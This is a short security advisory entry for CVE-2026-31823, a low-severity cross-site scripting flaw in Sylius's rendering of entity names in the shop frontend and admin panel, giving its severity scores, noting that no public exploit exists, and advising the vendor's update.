Cross-site scripting in Sylius - CVE-2026-31823
Published: April 27, 2026
Vulnerability identifier: #VU128218
CSH Severity: Low
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U/U:Clear
CVE-ID: CVE-2026-31823
CWE-ID: CWE-79
Exploitation vector: Remote access
Exploit availability:
No public exploit available
Vendor: Sylius
Affected software:
Sylius
Sylius
Detailed vulnerability description
The vulnerability allows a remote user to inject arbitrary HTML or JavaScript.
The vulnerability exists due to improper neutralization of input during web page generation in entity name rendering across the shop frontend and admin panel when rendering unsanitized entity names as raw HTML. A remote privileged user can supply a crafted entity name to inject arbitrary HTML or JavaScript.
User interaction is required for a victim to view the affected storefront or admin interface content.
How to mitigate CVE-2026-31823
Install security update from vendor's website.